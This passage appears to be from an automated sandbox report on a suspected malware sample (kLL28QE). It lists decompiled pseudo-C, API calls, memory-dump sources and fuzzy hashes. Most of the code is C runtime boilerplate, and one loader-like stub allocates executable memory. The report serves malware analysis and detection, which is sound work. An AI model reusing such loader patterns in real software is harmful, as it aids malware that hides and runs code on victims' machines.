                                                                                                                                                                                                      					if(_t14 != 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t15 = E0040D2E3(_a4);
                                                                                                                                                                                                      					__eflags = _t15;
                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                      						__eflags =  *0x423490 & 0x00000001;
                                                                                                                                                                                                      						if(( *0x423490 & 0x00000001) == 0) {
                                                                                                                                                                                                      							 *0x423490 =  *0x423490 | 0x00000001;
                                                                                                                                                                                                      							__eflags =  *0x423490;
                                                                                                                                                                                                      							E0040AEFC(0x423484);
                                                                                                                                                                                                      							E0040D2BD( *0x423490, 0x41a704);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						E0040AF49( &_v16, 0x423484);
                                                                                                                                                                                                      						E0040CD39( &_v16, 0x420fa4);
                                                                                                                                                                                                      						asm("int3");
                                                                                                                                                                                                      						_t47 = _t45;
                                                                                                                                                                                                      						_push(_t47);
                                                                                                                                                                                                      						_push(0xc);
                                                                                                                                                                                                      						_push(0x420ff8);
                                                                                                                                                                                                      						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                                                                                                                                                                                                      						_t42 = _v4;
                                                                                                                                                                                                      						__eflags = _t42;
                                                                                                                                                                                                      						if(_t42 != 0) {
                                                                                                                                                                                                      							__eflags =  *0x4250b0 - 3;
                                                                                                                                                                                                      							if( *0x4250b0 != 3) {
                                                                                                                                                                                                      								_push(_t42);
                                                                                                                                                                                                      								goto L16;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								E0040D6E0(_t28, 4);
                                                                                                                                                                                                      								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                      								_t24 = E0040D713(_t42);
                                                                                                                                                                                                      								_v40 = _t24;
                                                                                                                                                                                                      								__eflags = _t24;
                                                                                                                                                                                                      								if(_t24 != 0) {
                                                                                                                                                                                                      									_push(_t42);
                                                                                                                                                                                                      									_push(_t24);
                                                                                                                                                                                                      									E0040D743();
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_v16 = 0xfffffffe;
                                                                                                                                                                                                      								_t19 = E0040B70B();
                                                                                                                                                                                                      								__eflags = _v40;
                                                                                                                                                                                                      								if(_v40 == 0) {
                                                                                                                                                                                                      									_push(_v4);
                                                                                                                                                                                                      									L16:
                                                                                                                                                                                                      									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                                                                      										_t21 = E0040BFC1(__eflags);
                                                                                                                                                                                                      										 *_t21 = E0040BF7F(GetLastError());
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						return E0040E21D(_t19);
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t14;
                                                                                                                                                                                                      				goto L19;
                                                                                                                                                                                                      			}

















                                                                                                                                                                                                      0x0040af66
                                                                                                                                                                                                      0x0040af66
                                                                                                                                                                                                      0x0040af69
                                                                                                                                                                                                      0x0040af7d
                                                                                                                                                                                                      0x0040af80
                                                                                                                                                                                                      0x0040af88
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040af73
                                                                                                                                                                                                      0x0040af79
                                                                                                                                                                                                      0x0040af7b
                                                                                                                                                                                                      0x0040af8c
                                                                                                                                                                                                      0x0040af98
                                                                                                                                                                                                      0x0040af9a
                                                                                                                                                                                                      0x0040af9a
                                                                                                                                                                                                      0x0040afa3
                                                                                                                                                                                                      0x0040afad
                                                                                                                                                                                                      0x0040afb2
                                                                                                                                                                                                      0x0040afb7
                                                                                                                                                                                                      0x0040afc5
                                                                                                                                                                                                      0x0040afca
                                                                                                                                                                                                      0x0040afd0
                                                                                                                                                                                                      0x0040aec2
                                                                                                                                                                                                      0x0040b6b5
                                                                                                                                                                                                      0x0040b6b7
                                                                                                                                                                                                      0x0040b6bc
                                                                                                                                                                                                      0x0040b6c1
                                                                                                                                                                                                      0x0040b6c4
                                                                                                                                                                                                      0x0040b6c6
                                                                                                                                                                                                      0x0040b6c8
                                                                                                                                                                                                      0x0040b6cf
                                                                                                                                                                                                      0x0040b714
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040b6d1
                                                                                                                                                                                                      0x0040b6d3
                                                                                                                                                                                                      0x0040b6d9
                                                                                                                                                                                                      0x0040b6de
                                                                                                                                                                                                      0x0040b6e4
                                                                                                                                                                                                      0x0040b6e7
                                                                                                                                                                                                      0x0040b6e9
                                                                                                                                                                                                      0x0040b6eb
                                                                                                                                                                                                      0x0040b6ec
                                                                                                                                                                                                      0x0040b6ed
                                                                                                                                                                                                      0x0040b6f3
                                                                                                                                                                                                      0x0040b6f4
                                                                                                                                                                                                      0x0040b6fb
                                                                                                                                                                                                      0x0040b700
                                                                                                                                                                                                      0x0040b704
                                                                                                                                                                                                      0x0040b706
                                                                                                                                                                                                      0x0040b715
                                                                                                                                                                                                      0x0040b723
                                                                                                                                                                                                      0x0040b725
                                                                                                                                                                                                      0x0040b727
                                                                                                                                                                                                      0x0040b73a
                                                                                                                                                                                                      0x0040b73c
                                                                                                                                                                                                      0x0040b725
                                                                                                                                                                                                      0x0040b704
                                                                                                                                                                                                      0x0040b6cf
                                                                                                                                                                                                      0x0040b742
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040af7b
                                                                                                                                                                                                      0x0040af8b
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                                                        • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1411284514-0
                                                                                                                                                                                                      • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                                                                      • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 188 2f48146-2f4815f 189 2f48161-2f48163 188->189 190 2f48165 189->190 191 2f4816a-2f48176 CreateToolhelp32Snapshot 189->191 190->191 192 2f48186-2f48193 Module32First 191->192 193 2f48178-2f4817e 191->193 194 2f48195-2f48196 call 2f47e05 192->194 195 2f4819c-2f481a4 192->195 193->192 198 2f48180-2f48184 193->198 199 2f4819b 194->199 198->189 198->192 199->195
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02F4816E
                                                                                                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 02F4818E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.409089171.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F47000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2f47000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3833638111-0
                                                                                                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                      • Instruction ID: 157240974eb486c4bd7279820ee56febdb9338057e3c93c42dbd6113739f27da
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CF09C315007107FE7203BF59C8DB6F7AFCAF856A5F140529E746A11C0DFB0E8454651
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 201 40e7ee-40e7f6 call 40e7c3 203 40e7fb-40e7ff ExitProcess 201->203
                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E0040E7EE(int _a4) {
                                                                                                                                                                                                      
                                                                                                                                                                                                      				E0040E7C3(_a4); // executed
                                                                                                                                                                                                      				ExitProcess(_a4);
                                                                                                                                                                                                      			}



                                                                                                                                                                                                      0x0040e7f6
                                                                                                                                                                                                      0x0040e7ff

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                                                                                                                                                        • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                                                                                        • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                                                                                        • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2427264223-0
                                                                                                                                                                                                      • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                                                      • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 204 40d534-40d556 HeapCreate 205 40d558-40d559 204->205 206 40d55a-40d563 204->206
                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E0040D534(intOrPtr _a4) {
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                                                                      				 *0x4234b4 = _t6;
                                                                                                                                                                                                      				if(_t6 != 0) {
                                                                                                                                                                                                      					 *0x4250b0 = 1;
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					return _t6;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      0x0040d549
                                                                                                                                                                                                      0x0040d54f
                                                                                                                                                                                                      0x0040d556
                                                                                                                                                                                                      0x0040d55d
                                                                                                                                                                                                      0x0040d563
                                                                                                                                                                                                      0x0040d559
                                                                                                                                                                                                      0x0040d559
                                                                                                                                                                                                      0x0040d559

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateHeap
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                                                                                      • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                      • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 207 40ea0a-40ea16 call 40e8de 209 40ea1b-40ea1f 207->209
                                                                                                                                                                                                      C-Code - Quality: 25%
                                                                                                                                                                                                      			E0040EA0A(intOrPtr _a4) {
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                      				void* _t3;
                                                                                                                                                                                                      				void* _t4;
                                                                                                                                                                                                      				void* _t5;
                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                                      				_push(_a4);
                                                                                                                                                                                                      				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      0x0040ea0f
                                                                                                                                                                                                      0x0040ea11
                                                                                                                                                                                                      0x0040ea13
                                                                                                                                                                                                      0x0040ea16
                                                                                                                                                                                                      0x0040ea1f

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _doexit.LIBCMT ref: 0040EA16
                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1597249276-0
                                                                                                                                                                                                      • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                      • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 210 2f47e05-2f47e3f call 2f48118 213 2f47e41-2f47e74 VirtualAlloc call 2f47e92 210->213 214 2f47e8d 210->214 216 2f47e79-2f47e8b 213->216 214->214 216->214
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02F47E56
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.409089171.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F47000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2f47000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                      • Instruction ID: 428ae1a7b2e01c5270c71cc0a82053447e1e41f09e14fc1e1c35796f234ad5ab
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E113C79A00208EFDB01DF98C985E99BFF5AF08350F058094FA489B361D771EA50DF80
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408624952.0000000002EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EED000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2eed000_kLL28QE.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 50f270dfbe6da6ccf22b8cca45d817638b48c6cabe3ccd51ae6ce0ddebb15287
                                                                                                                                                                                                      • Instruction ID: c13f99addc9ac5ce59d685bde9296b827e138a650a41dc9f39aac299dda73b0c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50f270dfbe6da6ccf22b8cca45d817638b48c6cabe3ccd51ae6ce0ddebb15287
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0921F4B2544240EFDF05CF54DDC0B16BBAAFB8C318F24C669E94A0B206C336D812DBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408624952.0000000002EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EED000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2eed000_kLL28QE.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 4303238c088f3ba75555604f20c137d250268fd3df6a5ef902ce2af21d43e6b0
                                                                                                                                                                                                      • Instruction ID: 9f99b05a3f43646029b293031e6f3f29d5aee03749aa3ed6de0952093292989c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4303238c088f3ba75555604f20c137d250268fd3df6a5ef902ce2af21d43e6b0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A721F5B5584241DFDF05CF14DDC0B56BF69FB88328F24C669E84A0B246C336D856DBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408624952.0000000002EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EED000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2eed000_kLL28QE.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: da45c2eef842258f21eb288b67f9e7482d13c363d9a4a815aae9f780174a40c4
                                                                                                                                                                                                      • Instruction ID: 7ceaaff7e7a89def1410348fe470005fd8fa74354384a4794a3476553b6f62d4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: da45c2eef842258f21eb288b67f9e7482d13c363d9a4a815aae9f780174a40c4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF219D76544280DFCF16CF50D9C4B16BF62FB88318F28C6A9D9490B61AC33AD466CBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408624952.0000000002EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EED000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2eed000_kLL28QE.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: ad86be72230c5636077226f858d8d606ea00d3852f7a179e8f73017ca95feb00
                                                                                                                                                                                                      • Instruction ID: 565abbe8e017ada3e809b0cec084738537e09d3ba9cd3886dbc5f267d3cfe770
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad86be72230c5636077226f858d8d606ea00d3852f7a179e8f73017ca95feb00
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC11E676544280CFCF16CF10D9C4B16BF71FB84328F24C6A9D8450B65AC336D456CBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408624952.0000000002EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EED000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2eed000_kLL28QE.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 41b9fc00f08bcaf0c95a7dd16553121fb7d3207965d1cab72ac44b2f023b81fa
                                                                                                                                                                                                      • Instruction ID: f69be8d82116b3deedda6d704bbdfedf0336c06c04b2cb9f14454792dc9698b3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41b9fc00f08bcaf0c95a7dd16553121fb7d3207965d1cab72ac44b2f023b81fa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E01406154D3C05ED7138B258C94752BFB8DF43624F1DC1DBD8859F2A3C2699849C772
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408624952.0000000002EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EED000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2eed000_kLL28QE.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: d26d73a3988090ac1faa030e26c08b8768b64ca4a94b3098acd1593743fd1f83
                                                                                                                                                                                                      • Instruction ID: 89efdbf42607eba68021af9105e1499caae311c0b1345b253e59babf4aa334e0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d26d73a3988090ac1faa030e26c08b8768b64ca4a94b3098acd1593743fd1f83
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1801F231948380AAEB208E29DC84BA6BFDDEF41728F0CD11AED565F642C3799845D6B1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                                                                      			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                                                      				intOrPtr _v0;
                                                                                                                                                                                                      				void* _v804;
                                                                                                                                                                                                      				intOrPtr _v808;
                                                                                                                                                                                                      				intOrPtr _v812;
                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                      				intOrPtr _t11;
                                                                                                                                                                                                      				intOrPtr _t12;
                                                                                                                                                                                                      				intOrPtr _t13;
                                                                                                                                                                                                      				long _t17;
                                                                                                                                                                                                      				intOrPtr _t21;
                                                                                                                                                                                                      				intOrPtr _t22;
                                                                                                                                                                                                      				intOrPtr _t25;
                                                                                                                                                                                                      				intOrPtr _t26;
                                                                                                                                                                                                      				intOrPtr _t27;
                                                                                                                                                                                                      				intOrPtr* _t31;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t27 = __esi;
                                                                                                                                                                                                      				_t26 = __edi;
                                                                                                                                                                                                      				_t25 = __edx;
                                                                                                                                                                                                      				_t22 = __ecx;
                                                                                                                                                                                                      				_t21 = __ebx;
                                                                                                                                                                                                      				_t6 = __eax;
                                                                                                                                                                                                      				_t34 = _t22 -  *0x422234; // 0x6dd51581
                                                                                                                                                                                                      				if(_t34 == 0) {
                                                                                                                                                                                                      					asm("repe ret");
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				 *0x423b98 = _t6;
                                                                                                                                                                                                      				 *0x423b94 = _t22;
                                                                                                                                                                                                      				 *0x423b90 = _t25;
